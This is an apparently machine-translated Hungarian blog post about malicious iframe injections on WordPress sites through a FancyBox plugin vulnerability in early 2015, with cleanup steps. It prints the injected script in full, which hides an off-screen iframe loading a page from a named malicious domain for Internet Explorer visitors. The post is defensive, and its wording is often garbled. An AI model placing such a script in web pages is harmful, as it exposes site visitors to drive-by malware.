A hét elején számos honlapok és blogok WordPressfigyelmeztetéseket kapott rosszindulatú fertőzés keresztül Google Webmasters.
A probléma, amelyre Google Webmasters utalt, a jelenléte tőkehal / forgatókönyv iframe rosszindulatú program a forrás honlapok.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
Úgy tűnik, hogy ez egy sebezhetőség a csatlakoztatvívmányok FancyBox számára WordPress ami egészen tegnapig (05.02.2015) nem frissült sokáig.
E probléma megoldása és fertőtlenítő vírusok oldalak ezzel a rosszindulatú programmal, viszonylag egyszerű.
1. Tiltsa le a FancyBox plugint.
2. Törölje az összes FancyBox plugin fájlt a kiszolgálóról (FTP-n keresztül)
3. Telepítse a bővítmény új verzióját (Fancybox 3.0.4)
FancyBox számára WordPress 3.0.4
- Átnevezte a 3.0.3-ban említett biztonsági probléma által érintett beállítást. Ennek meg kell akadályoznia a rosszindulatú kód megjelenését azokon a webhelyeken, ahol a beépülő modul található updated a rosszindulatú kód eltávolítása nélkül.
FancyBox számára WordPress 3.0.3
- Javítva egy biztonsági kérdés.
Malware információ:
TYPE: Iframe átirányítás
TARGET: WordPress fancybox
KÁRTÉKONY DOMAIN: 203koko.eu
KÁRTÉKONY URI: http://203koko.eu/hjnfh/ipframe2.php
ROSSZINDULATÚ RAW KÓDOK:
MALWARE ÍRT: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Távolítsa el a rosszindulatú programokat WordPress .